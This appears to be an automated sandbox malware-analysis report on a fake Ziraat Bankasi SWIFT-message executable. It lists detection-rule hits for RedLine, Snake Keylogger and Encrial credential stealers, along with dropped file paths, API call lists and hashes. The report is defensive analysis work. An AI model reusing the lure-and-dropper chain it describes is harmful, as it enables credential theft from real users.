Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_0010F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_0010F7FF
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0065F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_0065F7FF

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.directiveness.exe.39b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.3f355c0.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3f355c0.14.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.0.server01.exe.870000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.0.server01.exe.870000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.directiveness.exe.4060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.3f65610.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3f65610.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.3f4d5f0.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3f4d5f0.12.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.3f65610.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3f65610.10.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.1359842969.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.1486418778.0000000004060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.1355540566.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7752, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: server01.exe PID: 7812, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth

.NET source code contains very large strings

Source: Trading_AIBot.exe.3.dr, cfRDgxIJtEfCD.cs	Long String: Length: 17605
Source: 3.2.RegSvcs.exe.2f55acc.7.raw.unpack, cfRDgxIJtEfCD.cs	Long String: Length: 17605
Source: 3.2.RegSvcs.exe.2f7836c.8.raw.unpack, cfRDgxIJtEfCD.cs	Long String: Length: 17605

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: This is a third-party compiled AutoIt script.	0_2_000A3D19
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe, 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dd48c3ed-3
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe, 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_beff1a6b-3
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe, 00000000.00000003.1332415999.000000000344D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_689604ee-1
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe, 00000000.00000003.1332415999.000000000344D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_244f8ddc-6
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: This is a third-party compiled AutoIt script.	2_2_005F3D19
Source: directiveness.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: directiveness.exe, 00000002.00000002.1355023710.000000000069E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_45c898c2-9
Source: directiveness.exe, 00000002.00000002.1355023710.000000000069E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: bSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d8d6ac41-8
Source: directiveness.exe, 0000000C.00000002.1485370426.000000000069E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_090755c8-b
Source: directiveness.exe, 0000000C.00000002.1485370426.000000000069E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: bSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_300dfd85-6
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e1b1017d-8
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_889db4af-d
Source: directiveness.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_44f46a3f-c
Source: directiveness.exe.0.dr	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_2b6e990f-7

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

File dump: apihost.exe.4.dr 665670656

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000E6606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_000E6606

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000DACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_000DACC5

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000E79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_000E79D3
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_006379D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_006379D3

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000CB043	0_2_000CB043
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000B3200	0_2_000B3200
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000D410F	0_2_000D410F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000C02A4	0_2_000C02A4
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000D038E	0_2_000D038E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000AE3B0	0_2_000AE3B0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000D467F	0_2_000D467F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000C06D9	0_2_000C06D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_0010AACE	0_2_0010AACE
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000D4BEF	0_2_000D4BEF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000CCCC1	0_2_000CCCC1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000A6F07	0_2_000A6F07
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000AAF50	0_2_000AAF50
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000BB11F	0_2_000BB11F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_001031BC	0_2_001031BC
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000CD1B9	0_2_000CD1B9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000C123A	0_2_000C123A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000D724D	0_2_000D724D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000E13CA	0_2_000E13CA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000A93F0	0_2_000A93F0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000BF563	0_2_000BF563
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000EB6CC	0_2_000EB6CC
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000A96C0	0_2_000A96C0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000A77B0	0_2_000A77B0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_0010F7FF	0_2_0010F7FF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000D79C9	0_2_000D79C9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000BFA57	0_2_000BFA57
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000A9B60	0_2_000A9B60
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000B3B70	0_2_000B3B70
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000A7D19	0_2_000A7D19
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000BFE6F	0_2_000BFE6F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000C9ED0	0_2_000C9ED0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000A7FA3	0_2_000A7FA3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_00C08168	0_2_00C08168
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0061B043	2_2_0061B043
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00603200	2_2_00603200
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0062410F	2_2_0062410F
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_006102A4	2_2_006102A4
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0062038E	2_2_0062038E
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_005FE3B0	2_2_005FE3B0
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0062467F	2_2_0062467F
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_006106D9	2_2_006106D9
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0065AACE	2_2_0065AACE
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00624BEF	2_2_00624BEF
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0061CCC1	2_2_0061CCC1
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_005FAF50	2_2_005FAF50
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_005F6F07	2_2_005F6F07
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0060B11F	2_2_0060B11F
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0061D1B9	2_2_0061D1B9
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_006531BC	2_2_006531BC
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0062724D	2_2_0062724D
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0061123A	2_2_0061123A
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_006313CA	2_2_006313CA
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_005F93F0	2_2_005F93F0
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0060F563	2_2_0060F563
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_005F96C0	2_2_005F96C0
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0063B6CC	2_2_0063B6CC
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0065F7FF	2_2_0065F7FF
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_005F77B0	2_2_005F77B0
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_006279C9	2_2_006279C9
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0060FA57	2_2_0060FA57
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00603B70	2_2_00603B70
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_005F9B60	2_2_005F9B60
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_005F7D19	2_2_005F7D19
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0060FE6F	2_2_0060FE6F
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00619ED0	2_2_00619ED0
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_005F7FA3	2_2_005F7FA3
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0196AD00	2_2_0196AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00408C60	3_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040DC11	3_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00407C3F	3_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418CCC	3_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00406CA0	3_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004028B0	3_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041A4BE	3_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418244	3_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00401650	3_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402F20	3_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004193C4	3_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418788	3_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402F89	3_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402B90	3_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004073A0	3_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02BB1298	3_2_02BB1298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02BB12CA	3_2_02BB12CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02BB0FE0	3_2_02BB0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02BB1328	3_2_02BB1328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02BB130D	3_2_02BB130D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02BB135A	3_2_02BB135A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02BB1030	3_2_02BB1030
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 5_2_00EAC530	5_2_00EAC530
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 5_2_00EA9480	5_2_00EA9480
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 5_2_00EAC521	5_2_00EAC521
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 5_2_00EA2DD1	5_2_00EA2DD1
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 5_2_00EA946F	5_2_00EA946F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04E2B490	6_2_04E2B490
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 12_2_0187F180	12_2_0187F180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_031D130D	13_2_031D130D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_031D1328	13_2_031D1328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_031D135A	13_2_031D135A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_031D1298	13_2_031D1298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_031D12CA	13_2_031D12CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_031D1030	13_2_031D1030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_031D1021	13_2_031D1021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_05A20A28	13_2_05A20A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_05A20A38	13_2_05A20A38
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_0637DAAC	17_2_0637DAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_06371B94	17_2_06371B94
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_0637E608	17_2_0637E608
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_06372498	17_2_06372498
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_0637E510	17_2_0637E510
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_0637255F	17_2_0637255F
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_063725B8	17_2_063725B8
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_0637E5AF	17_2_0637E5AF
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_063725A8	17_2_063725A8
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_06374174	17_2_06374174
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_06371D20	17_2_06371D20
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_064E3360	17_2_064E3360

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\server01.exe 7F73743991E06E23B0A1FEC66A8FA5F194D49FBE15C58473D10798758C856D31

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: String function: 000BEC2F appears 68 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: String function: 000CF8A0 appears 35 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: String function: 000C6AC0 appears 42 times
